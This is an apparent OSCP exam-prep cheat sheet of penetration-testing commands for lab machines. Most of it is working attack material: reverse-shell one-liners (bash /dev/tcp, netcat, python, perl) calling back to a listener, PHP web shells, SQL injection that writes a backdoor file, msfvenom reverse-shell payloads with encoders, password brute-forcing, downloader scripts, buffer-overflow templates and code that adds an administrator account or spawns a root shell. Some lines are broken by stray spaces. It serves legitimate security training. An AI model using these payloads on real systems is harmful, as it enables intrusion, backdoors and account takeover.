(OSCP/CheatSheet) From \Alex Dib
SSH Tunneling / Pivoting sshuttle (https://github.com/apenwarr/sshuttle) can chain sshuttle commands to reach a subnet within a subnet.
SecLists (https://github.com/danielmiessler/SecLists) almost exclusively for fuzzing or passwords.
Always try simple things first for the low hanging fruit such as sudo -l .
Vulnerable Machines
Kioptrix: Level 1 (https://www.vulnhub.com/entry/kioptrix-level-1-1,22/) Kioptrix: Level 1.1 (https://www.vulnhub.com/entry/kioptrix-level-11-2,23/) Kioptrix: Level 1.2 (https://www.vulnhub.com/entry/kioptrix-level-12-3,24/) Kioptrix: Level 1.3 (https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) FristiLeaks: 1.3 (https://www.vulnhub.com/entry/fristileaks-13,133/) Stapler: 1 (https://www.vulnhub.com/entry/stapler-1,150/) Brainpan: 1 (https://www.vulnhub.com/entry/brainpan-1,51/) VulnOS: 2 (https://www.vulnhub.com/entry/vulnos-2,147/) SickOs: 1.2 (https://www.vulnhub.com/entry/sickos-12,144/) pWnOS: 2.0 (https://www.vulnhub.com/entry/pwnos-20-pre-release,34/) Nebula (https://exploit-exercises.com/nebula/) Structure
| Hostname | IP | Exploit | ARP | Loot | OS |
|---|---|---|---|---|---|
| Box1 | 10.10.10.10 | MS08-067 | 10.10.10.11 | capture.pcap | Windows Server 2000 |
OSCP Structure:
├── Public │ ├── Box1 - 10.10.10.10 | └── Box2 - 10.10.10.11 ├── IT Department │ ├── Box1 - 10.11.11.10 │ └── Box2 - 10.11.11.11 ├── Dev Department │ ├── Box1 - 10.12.12.10 │ └── Box2 - 10.12.12.11 ├── Admin Department │ ├── Box1 - 10.13.13.10 │ └── Box2 - 10.13.13.11 ├── Exercises │ ├── 1.3.1.3 │ └── 2.2.1 └── Shortcuts nmap, run it from a rooted box instead of going over VPN!
nmap (https://github.com/ZephrFish/static-tools/blob/master/nmap/nmap). codingo’s Reconnoitre(https://github.com/codingo/Reconnoitre) # Nmap
nmap -sC -sV -vv -oA quick 10.10.10.10
nmap -sU -sV -vv -oA quick_udp 10.10.10.10
nmap -sC -sV -p- -vv -oA full 10.10.10.10
for x in 7000 8000 9000; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x 10.10.10.10; done
##Gobuster quick directory busting
gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux
gobuster -s 200,204,301,302,307,403 -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/ big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux - x .txt,.php
nikto -h 10.10.10.10
wpscan -u 10.10.10.10/wp/
nc -v 10.10.10.10 port
telnet 10.10.10.10 port
## SMB
nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,s mb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 10.10.10. 10
nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.10.10
enum4linux -a 10.10.10.10
rpcclient -U "" 10.10.10.10
smbclient //MOUNT/share
snmp-check 10.10.10.10
This section will include commands / code I used in the lab environment that I found useful
python -m SimpleHTTPServer 80
pip install pyftpdlib
python -m pyftpdlib -p 21 -w
bash -i >& /dev/tcp/10.10.10.10/4443 0>&1 # Netcat without -e ag
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 4443 >/tmp/f
nc -e /bin/sh 10.10.10.10 4443
nc -e cmd.exe 10.10.10.10 4443
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.conn ect(("10.10.10.10",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p= subprocess.call(["/bin/sh","-i"]);'
perl -e 'use Socket;$i="10.10.10.10";$p=4443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tc p"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDE RR,">&S");exec("/bin/sh -i")};'
rdesktop -u username -p password -g 85% -r disk:share=/root/ 10.10.10.10
<?php echo system($_GET["cmd"]);?> #Alternative <?php echo shell_exec($_GET["cmd"]);?> powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/ucb/
hostname && whoami && cat proof.txt && /sbin/ifconfig
hostname && whoami.exe && type proof.txt && ipconfig /all
sshuttle -vvr [email protected] 10.1.1.0/24
ssh <gateway> -L <local port to listen>:<remote host>:<remote port>
ssh <gateway> -R <remote port to bind>:<local host>:<local port>
ssh -D <local proxy port> -p <remote port> <target>
plink -l root -pw pass -R 3389:<localhost>:3389 <remote host>
sqlmap -u http://10.10.10.10 --crawl=1
sqlmap -u http://10.10.10.10 --dbms=mysql --dump
sqlmap -u http://10.10.10.10 --dbms=mysql --os-shell
Upload php command injection le
union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/www root/backdoor.php'
Load file
union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6
Bypasses ' or 1=1 LIMIT 1 -- ' or 1=1 LIMIT 1 -- - ' or 1=1 LIMIT 1# 'or 1# ' or 1=1 -- ' or 1=1 -- -
John the Ripper shadow file
$ unshadow passwd shadow > unshadow.db $ john unshadow.db hashcat -m 1800 -a 0 hash.txt rockyou.txt --username #Hashcat MD5 hashcat -m 500 -a 0 hash.txt rockyou.txt --username
hashcat -m 1600 -a 0 hash.txt rockyou.txt
hashcat -m 100 -a 0 hash.txt rockyou.txt --force
hashcat -m 400 -a 0 --remove hash.txt rockyou.txt
RDP user with password list
ncrack -vv --user offsec -P passwords rdp://10.10.10.10
SSH user with password list
hydra -l user -P pass.txt -t 10 10.10.10.10 ssh -s 22
FTP user with password list
medusa -h 10.10.10.10 -u user -P passwords.txt -M ftp
MSFVenom Payloads # PHP reverse shell msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f raw -o shell.php
msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f war -o shell.war
msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai
msfvenom -p bsd/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f elf -o shell.elf
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f c
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o non_staged.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai - f exe -o meterpreter.exe
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f python -o shell.py
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f asp -e x86/shikata_ga_nai -o shell.asp
msfvenom -f aspx -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -o shell.aspx
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f js_le -e generic/none -n 1 8
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1
msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f c - b "\x00\x04" -e x86/shikata_ga_nai
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -o shell.exe
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
Interactive Shell Upgrading to a fully interactive TTY using Python # Enter while in reverse shell $ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
$ stty raw -echo $ fg $ reset $ export SHELL=bash $ export TERM=xterm-256color $ stty rows <num> columns <cols> HTTP
The most common file transfer method.
python -m SimpleHTTPServer 80
wget 10.10.10.10/file
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.10.10/file.ex e','C:\Users\user\Desktop\file.exe')"
This process can be mundane, a quick tip would be to be to name the filename as ‘ file’ on your kali machine so that you don’t have to re-write the script multiple names, you can then rename the file on windows.
python -m pyftpdlib -p 21 -w
echo open 10.10.10.10 > ftp.txt echo USER anonymous >> ftp.txt echo ftp >> ftp.txt echo bin >> ftp.txt echo GET file >> ftp.txt echo bye >> ftp.txt ftp -v -n -s:ftp.txt
Generic.
atftpd --daemon --port 69 /tftp
tftp -i 10.10.10.10 GET nc.exe
VBS
When FTP/TFTP fails you, this wget script in VBS was the go to on Windows machines.
echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo StrFile = WScript.Arguments.Item(1) >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs echo Err.Clear >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs echo http.Open "GET",strURL,False >> wget.vbs echo http.Send >> wget.vbs echo varByteArray = http.ResponseBody >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs echo strData = "" >> wget.vbs echo strBuffer = "" >> wget.vbs echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs echo Next >> wget.vbs echo ts.Close >> wget.vbs cscript wget.vbs http://10.10.10.10/file.exe file.exe Triple check the bad characters.
payload = "\x41" * <length> + <ret_address> + "\x90" * 16 + <shellcode> + "\x43" * <remaining_le ngth>
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <length>
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l <length> -q <address>
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb nasm > jmp eax
badchars = ( "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )
The privilege escalation bible:
g0tmi1k’s (https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)post for Linuxfuzzysecurity’s (http://www.fuzzysecurity.com/tutorials/16.html)post for Windows.
write permissions to /etc/passwd or sticky bit.
LinuxPrivChecker (https://github.com/sleventyeleven/linuxprivchecker),
LinEnum ((https://github.com/rebootuser/LinEnum)), and
PowerUp (https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp).
- abatchy17’s Windows Exploits (https://github.com/abatchy17/WindowsExploits) &
- lucyoa’s kernel exploits (https://github.com/lucyoa/kernel-exploits).
- g0tmi1k Linux Priv Esc (https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) - fuzzysecurity Windows Priv Esc (http://www.fuzzysecurity.com/tutorials/16.html) - sploitspren Windows Priv Esc (https://www.sploitspren.com/2018-01-26-Windows-Privilege- - Escalation-Guide/) - togie6 Windows Priv Esc Guide (https://github.com/togie6/Windows-Privesc) Kernel Exploits:
abatchy17’s Windows Exploits (https://github.com/abatchy17/WindowsExploits) lucyoa’s kernel exploits (https://github.com/lucyoa/kernel-exploits) Scripts:
LinuxPrivChecker (https://github.com/sleventyeleven/linuxprivchecker) LinEnum (https://github.com/rebootuser/LinEnum) PowerUp (https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp) useradd.c
Windows - Add user.
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */ int main (){int i; i=system ("net user <username> <password> /add && net localgroup administrators <username> /ad d"); return 0} i686-w64-mingw32-gcc -o useradd.exe useradd.c
Set owner user ID.
int main(void){setresuid(0, 0, 0); system("/bin/bash")}
gcc suid.c -o suid
Powershell Run as
Run file as another user with powershell.
echo $username = '<username>' > runas.ps1 echo $securePassword = ConvertTo-SecureString "<password>" -AsPlainText -Force >> runas.ps1 echo $credential = New-Object System.Management.Automation.PSCredential $username, $securePasswo rd >> runas.ps1 echo Start-Process C:\Users\User\AppData\Local\Temp\backdoor.exe -Credential $credential >> runa s.ps1 Monitor processes to check for running cron jobs.
#!/bin/bash # Loop by line IFS=$'\n' old_process=$(ps -eo command) while true; do new_process=$(ps -eo command) diff <(echo "$old_process") <(echo "$new_process") | grep [\<\>] sleep 1 old_process=$new_process done Structure
OSCP/ ├── Offensive Security Lab Penetration Test Report │ ├── Introduction │ ├── Objective │ └── Scope ├── High-Level Summary │ └── Recommendations ├── Methodologies │ ├── Information Gathering │ ├── Service Enumeration │ ├── Penetration │ ├── Maintaining Access │ └── House Cleaning └── Findings ├── Box1 - 10.10.10.10 ├── Box2 - 10.10.10.11 ├── Box3 - 10.10.10.12 ├── Box4 - 10.10.10.13 └── Box5 - 10.10.10.14